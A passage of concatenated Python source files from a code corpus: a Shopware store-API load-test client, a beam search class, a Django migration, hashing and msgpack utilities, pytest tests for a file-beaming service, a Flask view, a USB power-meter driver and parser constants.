    # keywords) — confirm and replace with the real type.
    context: None

    def __init__(self, client, context):
        self.context = context
        self.client = client
        # Randomize the visitor's currency and language per simulated user.
        self.currency_id = random.choice(self.context.sales_channel['currencies'])
        self.language_id = random.choice(self.context.sales_channel['languages'])
        # Fresh anonymous context token (32 hex chars).
        self.token = str(uuid.uuid4()).replace('-', '')
        self.switch_context({
            'currencyId': self.currency_id,
            'languageId': self.language_id
        })

    # --- read-only catalog / meta endpoints --------------------------------

    def home(self):
        return self.request('/store-api/category/home', name='home')

    def navigation(self, activeId = 'main-navigation'):
        return self.request('/store-api/navigation/' + activeId + '/main-navigation', name = 'main-navigation')

    def footer(self, activeId = 'footer-navigation'):
        return self.request('/store-api/navigation/' + activeId + '/footer-navigation', name = 'footer-navigation')

    def service(self, activeId = 'service-navigation'):
        return self.request('/store-api/navigation/' + activeId + '/service-navigation', name = 'service-navigation')

    def shipping_methods(self):
        return self.request('/store-api/shipping-method', name='shipping-methods')

    def payment_methods(self):
        return self.request('/store-api/payment-method', name='payment-methods')

    def languages(self):
        return self.request('/store-api/language', name='languages')

    def currencies(self):
        return self.request('/store-api/currency', name='currencies')

    def salutations(self):
        return self.request('/store-api/salutation', name='salutations')

    def countries(self):
        return self.request('/store-api/country', name='countries')

    def search(self):
        # Full-text search with a random keyword from the corpus.
        return self.request('/store-api/search', name='search', parameters = {'search': random.choice(self.context.keywords)})

    def suggest(self):
        # Autocomplete-style suggestion search.
        return self.request('/store-api/search-suggest', name='suggest', parameters = {'search': random.choice(self.context.keywords)})

    def cart(self):
        return self.request('/store-api/checkout/cart', name='cart')

    def product(self):
        # Detail page of a random known product.
        return self.request('/store-api/product/' + random.choice(self.context.product_ids), name='product')

    def listing(self):
        # Listing page of a random known category.
        return self.request('/store-api/category/' + random.choice(self.context.category_ids), name='listing')

    # --- checkout flow -----------------------------------------------------

    def add_product_to_cart(self):
        product_id = random.choice(self.context.product_ids)
        return self.request(
            '/store-api/checkout/cart/line-item',
            name='add-product-to-cart',
            parameters = {
                'items': [{'type': 'product', 'id': product_id, 'referencedId': product_id}]
            }
        )

    def order(self):
        # Convert the current cart into an order.
        return self.request('/store-api/checkout/order', name='order')

    def register(self):
        """Register a throwaway customer account and adopt its context token."""
        self.email = 'user-' + str(uuid.uuid4()).replace('-', '') + '@example.com'
        # NOTE(review): '<PASSWORD>' looks like an anonymization placeholder
        # from the published source — substitute a real test password.
        response = self.request('/store-api/account/register', name='register', parameters={
            'storefrontUrl': self.context.sales_channel['domain'],
            'salutationId': self.context.sales_channel['salutationId'],
            'firstName': 'Firstname',
            'lastName': 'Lastname',
            'email': self.email,
            'password': '<PASSWORD>',
            'acceptedDataProtection': True,
            'billingAddress': {
                'salutationId': self.context.sales_channel['salutationId'],
                'street': 'Test street',
                'zipcode': '11111',
                'city': 'Test city',
                'countryId': self.context.sales_channel['countryId']
            }
        })
        self.token = response.headers['sw-context-token']
        return response

    def switch_context(self, parameters):
        """PATCH the session context (e.g. currency/language) and adopt the
        server-issued context token."""
        response = self.request('/store-api/context', name='context-switch', parameters=parameters, method='PATCH')
        self.token = response.headers['sw-context-token']
        return response

    # --- plumbing ----------------------------------------------------------

    def get_headers(self):
        """Headers sent on every call: JSON negotiation plus the per-session
        context token and the sales-channel access key."""
        return {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
            'sw-context-token': self.token,
            'sw-access-key': self.context.sales_channel['access_key']
        }

    def request(self, url, name, parameters=None, method='POST'):
        """Issue one named request against the store-api and return the raw
        response (status handling is left to callers / Locust).

        BUG FIX: the original ended with `if response.status_code in
        [200, 204]: return response` followed by an identical unconditional
        `return response` — the status check was dead code and has been
        collapsed to a single return. Also replaced the mutable default
        `parameters={}` with the None idiom.
        """
        if parameters is None:
            parameters = {}
        headers = self.get_headers()
        target = self.context.url + url
        if method == 'POST':
            response = self.client.post(target, json=parameters, headers=headers, name=name)
        elif method == 'PATCH':
            response = self.client.patch(target, json=parameters, headers=headers, name=name)
        else:
            response = self.client.get(target, headers=headers, name=name)
        return response
| StarcoderdataPython |
48046 | <gh_stars>0
# The MIT License (MIT)
#
# Copyright (c) 2015 <NAME>, 2018 UMONS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import tensorflow as tf
import numpy as np
class BeamSearch:
    """Beam search over an RNN's next-label distribution."""
    def __init__(self, predict, initial_state, prime_labels):
        """Initializes the beam search.
        Args:
            predict:
                A function that takes a `sample` and a `state`. It then performs
                the computation on the last word in `sample`.
            initial_state:
                The initial state of the RNN.
            prime_labels:
                A list of labels corresponding to the priming text. This must
                not be empty.
        """
        if not prime_labels:
            raise ValueError('prime_labels must be a non-empty list.')
        self.predict = predict
        self.initial_state = initial_state
        self.prime_labels = prime_labels
    def predict_samples(self, samples, states):
        # Run predict on each live beam independently and stack the
        # per-beam probability rows into one array (shape: n_beams x vocab).
        probs = []
        next_states = []
        for i in range(len(samples)):
            prob, next_state = self.predict(samples[i], states[i])
            probs.append(prob.squeeze())
            next_states.append(next_state)
        return np.array(probs), next_states
    def search(self, oov, eos, k=1, maxsample=4000, use_unk=False):
        """Return k samples (beams) and their NLL scores.
        Each sample is a sequence of labels, either ending with `eos` or
        truncated to length of `maxsample`. `use_unk` allow usage of `oov`
        (out-of-vocabulary) label in samples
        """
        # A list of probabilities of our samples.
        probs = []
        prime_sample = []
        prime_score = 0
        prime_state = self.initial_state
        # Initialize the live sample with the prime.
        for i, label in enumerate(self.prime_labels):
            prime_sample.append(label)
            # The first word does not contribute to the score as the probs have
            # not yet been determined.
            if i > 0:
                # probs here is the (1, vocab) array from the previous step.
                prime_score = prime_score - np.log(probs[0, label])
            probs, prime_state = self.predict(prime_sample, prime_state)
        dead_k = 0  # samples that reached eos
        dead_samples = []
        dead_scores = []
        dead_states = []
        live_k = 1  # samples that did not yet reached eos
        live_samples = [prime_sample]
        live_scores = [prime_score]
        live_states = [prime_state]
        while live_k and dead_k < k:
            # total score for every sample is sum of -log of word prb
            cand_scores = np.array(live_scores)[:, None] - np.log(probs)
            # NOTE(review): this masks the oov label(s) (score 1e20) when
            # use_unk is True, which contradicts the docstring's "allow usage
            # of oov" — confirm the intended polarity of use_unk.
            if use_unk and oov is not None:
                if isinstance(oov, list):
                    for word in oov:
                        cand_scores[:, word] = 1e20
                else:
                    cand_scores[:, oov] = 1e20
            cand_flat = cand_scores.flatten()
            # find the best (lowest) scores we have from all possible samples and new words
            ranks_flat = cand_flat.argsort()[:(k - dead_k)]
            live_scores = cand_flat[ranks_flat]
            # append the new words to their appropriate live sample
            # (flat index r encodes beam index r // voc_size and label r % voc_size)
            voc_size = probs.shape[1]
            live_samples = [live_samples[r // voc_size] + [r % voc_size] for r in ranks_flat]
            live_states = [live_states[r // voc_size] for r in ranks_flat]
            # live samples that should be dead are...
            zombie = [s[-1] == eos or len(s) >= maxsample for s in live_samples]
            # add zombies to the dead
            dead_samples += [s for s, z in zip(live_samples, zombie) if z]
            dead_scores += [s for s, z in zip(live_scores, zombie) if z]
            dead_states += [s for s, z in zip(live_states, zombie) if z]
            dead_k = len(dead_samples)
            # remove zombies from the living
            live_samples = [s for s, z in zip(live_samples, zombie) if not z]
            live_scores = [s for s, z in zip(live_scores, zombie) if not z]
            live_states = [s for s, z in zip(live_states, zombie) if not z]
            live_k = len(live_samples)
            # Finally, compute the next-step probabilities and states.
            probs, live_states = self.predict_samples(live_samples, live_states)
        return dead_samples + live_samples, dead_scores + live_scores
| StarcoderdataPython |
4837385 | <reponame>daojunL/Art-Event-Gallery
# Generated by Django 2.1.5 on 2020-04-21 04:09
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: marks the `artist` model as managed
    # (Django controls its table lifecycle).
    dependencies = [
        ('dashboard', '0005_auto_20200421_0331'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='artist',
            options={'managed': True},
        ),
    ]
| StarcoderdataPython |
1636236 | from .pycuteweb import Application
| StarcoderdataPython |
1777427 | import hashlib
import os
import sys
import msgpack
from struct import pack
addressChecksumLength = 4
def int64ToBinary(i):
    # Serialize i as 8 big-endian bytes (">q" = big-endian signed int64).
    # Raises struct.error if i is outside the signed 64-bit range or not an int.
    # TODO: error handling
    # >q means big endian, long long (int64)
    return pack(">q", i)
def intToBytes(i):
    """Wrap a single byte value (0..255) in a length-1 bytes object;
    raises ValueError for out-of-range values."""
    return bytes((i,))
def sha256(data):
    """Return the 32-byte SHA-256 digest of data."""
    return hashlib.sha256(data).digest()
def ripemd160(data):
    # 20-byte RIPEMD-160 digest.
    # NOTE(review): 'ripemd160' availability depends on the OpenSSL build
    # backing hashlib (disabled by default in OpenSSL 3) — confirm on target.
    return hashData(hashlib.new('ripemd160'), data)
def hashPubKey(publicKey):
    """Bitcoin-style HASH160 of a public key: RIPEMD160(SHA256(key bytes))."""
    serialized = publicKey.to_string()
    return ripemd160(sha256(serialized))
def checksum(payload):
    """First addressChecksumLength bytes of the double-SHA256 of payload."""
    digest = sha256(sha256(payload))
    return digest[:addressChecksumLength]
def hashData(hashObj, data):
    # Feed data into an already-constructed hashlib object and return its digest.
    hashObj.update(data)
    return hashObj.digest()
# prefer toStr(bytes) than bytes.decode() for readability
def toStr(obj):
    """Coerce obj to str: pass str through, decode bytes as UTF-8,
    and fall back to str() for everything else."""
    if isinstance(obj, bytes):
        return obj.decode()
    if isinstance(obj, str):
        return obj
    return str(obj)
def isSubstringOf(a, b):
    """Return True when b starts with a.

    NOTE(review): the name suggests a general substring test, but the
    original logic (b.find(a) == 0) only matches prefixes; that behavior
    is preserved here via startswith.
    """
    return b.startswith(a)
# msgpack serialize
def encodeMsg(d, encoder=None):
    # use_bin_type=True keeps bytes and str distinct on the wire;
    # `encoder` handles objects msgpack cannot serialize natively.
    return msgpack.packb(d, default=encoder, use_bin_type=True)
# msgpack deserialize
def decodeMsg(msg, decoder=None):
    # raw=False decodes msgpack strings to str (not bytes);
    # `decoder` reverses any custom encoding done in encodeMsg.
    return msgpack.unpackb(msg, object_hook=decoder, raw=False)
def decodeList(msg, decoder):
    # Deserialize a msgpack-encoded list, mapping each element through decoder.
    encodedObjs = decodeMsg(msg)
    return [decoder(obj) for obj in encodedObjs]
def canWaitKey():
    # Keypress waiting only works when stdin is an interactive terminal
    # (not a pipe or redirected file).
    return sys.stdin.isatty()
# https://stackoverflow.com/a/34956791
# Cross platform, blocking function to get a pressed key
def waitKey():
    ''' Wait for a key press on the console and return it. '''
    # NOTE(review): the return type is inconsistent — bytes from
    # msvcrt.getch() on Windows, a one-character str on POSIX, and the
    # literal string 'SIGINT' on Ctrl-C; callers must handle all three.
    result = None
    if os.name == 'nt':
        import msvcrt
        result = msvcrt.getch()
    else:
        import termios
        fd = sys.stdin.fileno()
        oldterm = termios.tcgetattr(fd)
        newattr = termios.tcgetattr(fd)
        # Disable canonical mode and echo so a single keypress returns
        # immediately without waiting for Enter.
        newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
        termios.tcsetattr(fd, termios.TCSANOW, newattr)
        try:
            result = sys.stdin.read(1)
        except IOError:
            pass
        except KeyboardInterrupt:
            result = 'SIGINT'
        finally:
            # Always restore the original terminal attributes.
            termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
    return result
| StarcoderdataPython |
1749039 | import datetime
import os
import stat
import pytest
from flask import current_app
from flask_app.models import Beam, BeamType, Pin
from flask_app.tasks import beam_up, delete_beam, vacuum
from flask_app.utils.remote_combadge import _COMBADGE_UUID_PART_LENGTH
from flask_app.utils.remote_host import RemoteHost
_TEMPDIR_COMMAND = RemoteHost._TEMPDIR_COMMAND
def is_vacuumed(db_session, beam):
    """Reload *beam* from the database and report whether vacuum marked it
    deleted.

    Raises RuntimeError if the beam row no longer exists.
    """
    refreshed = db_session.query(Beam).filter_by(id=beam.id).one_or_none()
    if refreshed is None:
        # BUG FIX: the original rebound `beam` to the query result, so this
        # path evaluated `beam.id` on None and raised AttributeError instead
        # of the intended RuntimeError.
        raise RuntimeError(f"Beam {beam.id} not found")
    return refreshed.deleted
def test_completed_beam_past_date_should_be_vacuumed(
    eager_celery, db_session, create_beam, expired_beam_date
):
    """A completed beam older than the retention window gets deleted."""
    expired = create_beam(start=expired_beam_date, completed=True)
    vacuum.delay()
    assert is_vacuumed(db_session, expired)
def test_beam_before_date_should_not_be_vacuumed(eager_celery, db_session, create_beam, now):
    """A freshly created beam is inside the retention window and survives."""
    fresh = create_beam(start=now, completed=True)
    vacuum.delay()
    assert not is_vacuumed(db_session, fresh)
def test_not_completed_beam_past_date_should_be_vacuumed(
    eager_celery, db_session, create_beam, expired_beam_date
):
    """Expiry also applies to beams that never completed."""
    stale = create_beam(start=expired_beam_date, completed=False)
    vacuum.delay()
    assert is_vacuumed(db_session, stale)
def test_not_completed_beam_before_date_should_not_be_vacuumed(
    eager_celery, db_session, create_beam, now
):
    """An incomplete but recent beam must not be vacuumed."""
    fresh = create_beam(start=now, completed=False)
    vacuum.delay()
    assert not is_vacuumed(db_session, fresh)
def test_beam_with_open_issues_should_not_be_vacuumed(
    eager_celery, db_session, create_beam, expired_beam_date, issue
):
    """An expired beam with an attached issue is kept for investigation."""
    beam = create_beam(start=expired_beam_date, completed=True)
    beam.issues.append(issue)
    db_session.commit()
    vacuum.delay()
    assert not is_vacuumed(db_session, beam)
def test_pinned_beam_should_not_be_vacuumed(
    eager_celery, db_session, create_beam, expired_beam_date, user
):
    """A user pin protects an otherwise-expired beam from vacuuming."""
    beam = create_beam(start=expired_beam_date, completed=True)
    pin = Pin(user_id=user.id, beam_id=beam.id)
    db_session.add(pin)
    db_session.commit()
    vacuum.delay()
    assert not is_vacuumed(db_session, beam)
def test_beam_without_file_should_be_vacuumed(
    eager_celery, db_session, create_beam, expired_beam_date
):
    """An expired beam is vacuumed even when it has no associated file."""
    beam = create_beam(start=expired_beam_date, completed=True, add_file=False)
    db_session.commit()
    vacuum.delay()
    assert is_vacuumed(db_session, beam)
def test_beam_with_beam_type_greater_threshold_is_not_vacuumed(
    eager_celery, db_session, create_beam, expired_beam_date, vacuum_threshold
):
    # threshold default threshold now
    #      | 10 days |        60 days        |
    # -----------------------------------------------------> date
    # |
    # beam
    #
    # beam is before the default threshold (60 days) so it should usually be vacuumed
    # but here we increase the threshold by 10 more days (vacuum_threshold=vacuum_threshold + 10)
    # and therefore the beam is *within* the threshold and will *not* be vacuumed
    beam = create_beam(start=expired_beam_date, completed=True)
    # A per-beam-type threshold overrides the global retention window.
    beam_type = BeamType(name="beam_type_1", vacuum_threshold=vacuum_threshold + 10)
    db_session.add(beam_type)
    beam.type = beam_type
    db_session.commit()
    vacuum.delay()
    assert not is_vacuumed(db_session, beam)
def test_beam_with_beam_type_smaller_threshold_is_vacuumed(
    eager_celery, db_session, create_beam, now
):
    """A beam type with a tiny vacuum threshold makes a recent beam expire.

    default threshold                          threshold    now
        |                 59 days              |   1 day     |
        ----------------------------------------------------------> date
                                                  |
                                                 beam

    The beam (2 days old) is well within the default threshold (60 days) and
    would normally be kept, but its beam type lowers the threshold to a
    single day, so the beam falls outside the window and *must* be vacuumed.
    """
    strict_threshold = 1
    stale_beam = create_beam(start=now - datetime.timedelta(days=2), completed=True)
    strict_type = BeamType(name="beam_type_1", vacuum_threshold=strict_threshold)
    db_session.add(strict_type)
    stale_beam.type = strict_type
    db_session.commit()
    vacuum.delay()
    assert is_vacuumed(db_session, stale_beam)
@pytest.mark.parametrize("os_type", ["linux", "windows"])
def test_beam_up(
    db_session,
    now,
    create_beam,
    eager_celery,
    monkeypatch,
    mock_ssh_client,
    mock_sftp_client,
    mock_rsa_key,
    uuid4,
    os_type,
    combadge_assets_dir,
):
    """End-to-end check of the beam_up task against mocked SSH/SFTP clients.

    Verifies the combadge binary for the target OS is uploaded, made
    executable (linux only), executed with the expected arguments, and
    removed from the remote host afterwards.
    """
    beam = create_beam(start=now, completed=False)
    if os_type == "windows":
        beam.host = "mock-windows-host"
        db_session.commit()
    result = beam_up.delay(
        beam_id=beam.id,
        host=beam.host,
        directory=beam.directory,
        username="root",
        auth_method="stored_key",
        pkey="mock-pkey",
        # NOTE(review): original value was redacted and left invalid syntax.
        # stored_key auth uses the pkey, so no password should be needed —
        # TODO confirm against beam_up's signature.
        password=None,
        combadge_version="v2",
    )
    assert result.successful(), result.traceback
    # Re-fetch the beam to observe state written by the task.
    beam = db_session.query(Beam).filter_by(id=beam.id).one()
    assert beam.error is None
    assert len(mock_ssh_client.instances) == 1
    # Remote combadge name embeds a prefix of the (mocked) uuid.
    uuid_part = uuid4.hex[:_COMBADGE_UUID_PART_LENGTH]
    ext = ".exe" if os_type == "windows" else ""
    remote_dir = r"C:\Users\root\AppData\Local\Temp" if os_type == "windows" else "/tmp"
    sep = "\\" if os_type == "windows" else "/"
    combadge = f"{remote_dir}{sep}combadge_{uuid_part}{ext}"
    env_vars = "RUST_LOG=trace " if os_type != "windows" else ""
    assert mock_ssh_client.instances[0].commands == [
        "uname",
        _TEMPDIR_COMMAND,
        env_vars + f"{combadge} -b {beam.id} -p {beam.directory} -t scotty",
    ]
    assert len(mock_sftp_client.instances) == 1
    expected_calls = [
        {
            "action": "put",
            "args": {
                "local": f"{combadge_assets_dir}/v2/combadge_{os_type}/combadge{ext}",
                "remote": combadge,
            },
        },
    ]
    if os_type == "linux":
        # Windows has no executable bit, so chmod is expected on linux only.
        expected_calls.append(
            {
                "action": "chmod",
                "args": {
                    "remote": combadge,
                    "mode": stat.S_IEXEC,
                },
            }
        )
    expected_calls.append({"action": "remove", "args": {"remote": combadge}})
    mock_sftp_client.get_one_instance_or_raise().assert_calls_equal_to(expected_calls)
    # Nothing may remain on the remote side; the combadge went to the trash.
    assert mock_sftp_client.files == {}
    assert len(mock_sftp_client.trash) == 1
    assert mock_sftp_client.trash[0] == combadge
def test_delete_beam(eager_celery, beam_with_real_file):
    """delete_beam removes the stored file from disk and flags the beam deleted."""
    beam = beam_with_real_file
    stored_path = os.path.join(
        current_app.config["STORAGE_PATH"], beam.files[0].storage_name
    )
    # Preconditions: the file exists and the beam is live.
    assert os.path.exists(stored_path)
    assert not beam.deleted
    delete_beam.delay(beam.id)
    assert not os.path.exists(stored_path)
    assert beam.deleted
| StarcoderdataPython |
# -*- coding: utf-8 -*-
"""
:author: <NAME> (徐天明)
:url: http://greyli.com
:copyright: © 2021 <NAME> <<EMAIL>>
:license: MIT, see LICENSE for more details.
"""
from flask import render_template, current_app, request, Blueprint
from albumy.models import User, Photo
user_bp = Blueprint('user', __name__)
@user_bp.route('/<username>')
def index(username):
    """Render a user's profile page with a paginated grid of their photos."""
    user = User.query.filter_by(username=username).first_or_404()
    page = request.args.get('page', 1, type=int)
    per_page = current_app.config['ALBUMY_PHOTO_PER_PAGE']
    photo_query = Photo.query.with_parent(user).order_by(Photo.timestamp.desc())
    pagination = photo_query.paginate(page, per_page)
    return render_template(
        'user/index.html',
        user=user,
        pagination=pagination,
        photos=pagination.items,
    )
| StarcoderdataPython |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import copy
import datetime
import struct
import threading
import usb.core
import usb.util
# USB vendor/product IDs of the Fujitsu Component FX5204PS power strip.
VENDOR_FUJITSUCOMP = 0x0430
PRODUCT_FUJITSUCOMP_FX5204PS = 0x0423
# bmRequestType bitmasks for vendor-specific control transfers.
OUT_VENDOR_DEVICE = (usb.util.CTRL_OUT
                     |usb.util.CTRL_TYPE_VENDOR
                     |usb.util.CTRL_RECIPIENT_DEVICE)
IN_VENDOR_DEVICE = (usb.util.CTRL_IN
                    |usb.util.CTRL_TYPE_VENDOR
                    |usb.util.CTRL_RECIPIENT_DEVICE)
# Vendor-specific bRequest command codes used by this driver.
CMD_START = 0x01
CMD_VALUE = 0x20
CMD_GET_FIRMWARE = 0xC0
CMD_GET_SERIAL = 0xC1
CMD_GET_VOLTAGE = 0xB0
CMD_GET_TEMP = 0xB4
CMD_GET_FREQ = 0xA1
CMD_GET_UNK0 = 0xA2  # purpose unknown — not used below
# Measurement modes (not used in this file; presumably for CMD_VALUE — TODO confirm).
MODE_WATTAGE = 0x10
MODE_CURRENT = 0x30
class FX5204PS(threading.Thread):
    """Reader thread for the Fujitsu FX5204PS smart power strip.

    Continuously polls per-outlet wattage over USB, and samples voltage,
    mains frequency and temperature once per ``sumup_interval`` seconds.
    All readings are exposed through thread-safe properties; the wattage
    additionally tracks a per-window maximum and an exponential moving
    average with smoothing factor ``ema_alpha``.
    """

    def __init__(self, sumup_interval=5, ema_alpha=0.1):
        super(FX5204PS, self).__init__()
        self._stop_event = threading.Event()
        self._lock = threading.Lock()
        self._sumup_interval = datetime.timedelta(seconds=sumup_interval)
        self._ema_alpha = ema_alpha  # EMA smoothing factor for wattage_avg
        # Far past so the first run() iteration triggers a full sensor sweep.
        self._last_sumup_time = datetime.datetime(1970, 1, 1)
        self._count = 0  # wattage samples seen in the current window
        self._firmware_version = [0, 0]
        self._serial_number = 0
        self._endpoint = None
        self._temperature = 0  # raw units; property divides by 10000
        self._frequency = 0    # raw units; property divides by 1e6 to get Hz
        self._voltage = 0
        self._wattage = [0, 0, 0, 0]      # per-outlet, in 1/100 W
        self._wattage_max = [0, 0, 0, 0]
        self._wattage_avg = [0, 0, 0, 0]
        self._device = self._find_device()
        self._initialize()

    @property
    def firmware_version(self):
        """Firmware version as a [major, minor] pair (read once at init)."""
        return self._firmware_version

    @property
    def serial_number(self):
        """Device serial number (read once at init)."""
        return self._serial_number

    @property
    def temperature(self):
        """Last sampled temperature (raw value / 10000)."""
        with self._lock:
            return self._temperature / 10000

    @property
    def frequency(self):
        """Last sampled mains frequency in Hz."""
        with self._lock:
            return self._frequency / 1000000

    @property
    def voltage(self):
        """Last sampled mains voltage."""
        with self._lock:
            return self._voltage

    @property
    def wattage(self):
        """Latest per-outlet wattage in watts (device reports 1/100 W)."""
        with self._lock:
            return [w / 100 for w in self._wattage]

    @property
    def wattage_max(self):
        """Per-outlet maximum wattage within the current sum-up window."""
        with self._lock:
            return [w / 100 for w in self._wattage_max]

    @property
    def wattage_avg(self):
        """Per-outlet exponential moving average of wattage, in watts."""
        with self._lock:
            return [w / 100 for w in self._wattage_avg]

    def stop(self):
        """Signal the polling loop to exit and wait for the thread to finish."""
        self._stop_event.set()
        self.join()

    def _find_device(self):
        """Locate the FX5204PS on the USB bus; raise if it is not attached."""
        dev = usb.core.find(idVendor=VENDOR_FUJITSUCOMP,
                            idProduct=PRODUCT_FUJITSUCOMP_FX5204PS)
        if dev is None:
            raise Exception('No FX5204PS device found.')
        return dev

    def _initialize(self):
        """Select the device configuration and read the static identifiers."""
        # FX5204PS has only one configuration set.
        cfg = self._device[0]
        self._device.set_configuration(cfg)
        # FX5204PS has only one Interface and one Alternate setting.
        iface = cfg[(0, 0)]
        # FX5204PS has only one outbound endpoint.
        self._endpoint = iface[0]
        # Firmware version arrives BCD-encoded: one decimal byte per part.
        fmv = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
                                         CMD_GET_FIRMWARE, 0, 0, 2)
        self._firmware_version = [(v >> 4) * 10 + (v & 0x0F) for v in fmv]
        # Serial number: three BCD bytes forming a six-digit number.
        sno = [(v >> 4) * 10 + (v & 0x0F)
               for v
               in self._device.ctrl_transfer(IN_VENDOR_DEVICE,
                                             CMD_GET_SERIAL, 0, 0, 3)]
        self._serial_number = sno[0]*10000 + sno[1]*100 + sno[2]

    def run(self):
        """Polling loop: wattage on every packet, slow sensors once per window."""
        while not self._stop_event.is_set():
            now = datetime.datetime.now()
            self._update_wattage()
            if (now - self._last_sumup_time > self._sumup_interval):
                self._update_frequency()
                self._update_voltage()
                self._update_temperature()
                self._last_sumup_time = now
                self._count = 0  # restart the max-tracking window

    def _update_wattage(self):
        """Read one 16-byte wattage packet and update current/max/EMA values."""
        data = self._endpoint.read(16)
        # Bytes 8..15 hold four big-endian uint16 per-outlet readings.
        wattage = struct.unpack('!4H', data[8:])
        with self._lock:
            self._wattage = wattage
            if self._count == 0:
                # First sample of a new window seeds the maximum.
                self._wattage_max = copy.copy(wattage)
            else:
                self._wattage_max = [self._wattage_max[i]
                                     if self._wattage_max[i] > wattage[i]
                                     else wattage[i]
                                     for i in range(len(wattage))]
            self._wattage_avg = [self._wattage[i] * self._ema_alpha
                                 + self._wattage_avg[i] * (1.0-self._ema_alpha)
                                 for i in range(len(self._wattage))]
            self._count += 1

    def _update_frequency(self):
        """Sample the mains frequency (stored scaled by 1e6)."""
        data = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
                                          CMD_GET_FREQ, 0, 0, 8)
        freq = 0
        if (data[6] == 0) and (data[7] == 0):
            freq = 0
        else:
            # Period counter, little-endian in the first two bytes.
            val = (data[1] << 8) + data[0]
            if val == 0:
                # BUGFIX: the original fell through here ("# XXX" + pass) and
                # then divided by zero below; report 0 Hz instead.
                freq = 0
            else:
                # frequency = 2 MHz reference / period count, kept scaled
                # by 1e6 so the `frequency` property can divide it back out.
                freq = 2000000
                freq *= 1000000
                freq //= val
        with self._lock:
            self._frequency = freq

    def _update_voltage(self):
        """Sample the mains voltage (single-byte reading)."""
        (volt,) = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
                                             CMD_GET_VOLTAGE, 0, 0, 1)
        with self._lock:
            self._voltage = volt

    def _update_temperature(self):
        """Sample the temperature; raw value offset by 273150 (Kelvin-like scale)."""
        data = self._device.ctrl_transfer(IN_VENDOR_DEVICE,
                                          CMD_GET_TEMP, 0, 0, 2)
        (temp,) = struct.unpack('!H', data)
        with self._lock:
            self._temperature = temp + 273150
if __name__ == '__main__':
    # Demo: start the reader thread and dump all readings once per second
    # until interrupted with Ctrl-C.
    import time
    fx = FX5204PS()
    print('Firmware: {0}'.format(fx.firmware_version))
    print('Serial #: {0}'.format(fx.serial_number))
    fx.start()
    try:
        while True:
            time.sleep(1)
            print('Volt: {0}V'.format(fx.voltage))
            print('Freq: {0}Hz'.format(fx.frequency))
            print('Temp: {0}C'.format(fx.temperature))
            print('Watt: {0}W@0, {1}W@1, {2}W@2, {3}W@3'.format(*fx.wattage))
            print('(Avg): {0}W@0, {1}W@1, {2}W@2, {3}W@3'.format(*fx.wattage_avg))
            print('(Max): {0}W@0, {1}W@1, {2}W@2, {3}W@3'.format(*fx.wattage_max))
    except KeyboardInterrupt:
        # Clean shutdown: stop() sets the event and joins the thread.
        fx.stop()
| StarcoderdataPython |
# utility/constants.py
'''Global constants and file paths shared across the AMR/MRP parsing pipeline.

All filesystem paths point into the user's home directory; adjust them for
your system.  The integer constants below are positional indices into the
various per-token feature tuples used by the data loaders.
'''
import os,re
# Change the path according to your system
embed_path = os.path.expanduser('~') + "/git-workspace/glove/generic/glove.840B.300d.txt" #file containing glove embedding
core_nlp_url = 'http://localhost:9000' #local host url of standford corenlp server
allFolderPath = os.path.expanduser('~')+"/git-workspace/amr_data/e25/data/alignments/split/"
#allFolderPath = os.path.expanduser('~')+"/git-workspace/learnlab/data/e25/data/amrs/split/"
resource_folder_path = os.path.expanduser('~')+"/git-workspace/amr_data/e25/"
frame_folder_path = resource_folder_path+"/data/frames/propbank-frames-xml-2016-03-08/"
# the following files are in the utility/resources folder
vallex_file_path = os.path.expanduser('~')+"/git-workspace/mrp_data/vallex_en.xml"
semi_folder_path = os.path.expanduser('~')+"/git-workspace/mrp_data/1214/etc/"
dm_mwe_file= os.path.expanduser('~')+"/git-workspace/mrp_data/dm.joints"
psd_mwe_file= os.path.expanduser('~')+"/git-workspace/mrp_data/psd.joints"
#allFolderPath = os.path.expanduser('~')+"/Data/amr_annotation_r2/data/alignments/split"
#resource_folder_path = os.path.expanduser('~')+"/Data/amr_annotation_r2/"
#frame_folder_path = resource_folder_path+"data/frames/propbank-frames-xml-2016-03-08/"
have_org_role = resource_folder_path+"have-org-role-91-roles-v1.06.txt" #not used
have_rel_role = resource_folder_path+"have-rel-role-91-roles-v1.06.txt" #not used
morph_verbalization = resource_folder_path+"morph-verbalization-v1.01.txt" #not used
verbalization = resource_folder_path+"verbalization-list-v1.06.txt"
# Reserved vocabulary index slots.
PAD = 0
UNK = 1
# BERT special tokens and their vocabulary indices.
BERT_PAD = '[PAD]'
BERT_PAD_INDEX = 0
BERT_SEP = '[SEP]'
BERT_SEP_INDEX = 102
BERT_CLS= '[CLS]'
BERT_CLS_INDEX = 101
# Generic special tokens for the internal vocabularies.
PAD_WORD = '<pad>'
UNK_WORD = '<unk>'
BOS_WORD = '<s>'
EOS_WORD = '</s>'
NULL_WORD = ""
UNK_WIKI = '<WIKI>'
MWE_END = "<MWE_END>"
Special = [NULL_WORD,UNK_WORD,PAD_WORD]
#Categories
Rule_Frame = "Frame"
Rule_Constant = "Constant"
Rule_String = "String"
Rule_Concept = "Concept"
Rule_Comp = "COMPO"
Rule_Num = "Num"
Rule_Re = "Re" #corenference
Rule_Ner = "Ner"
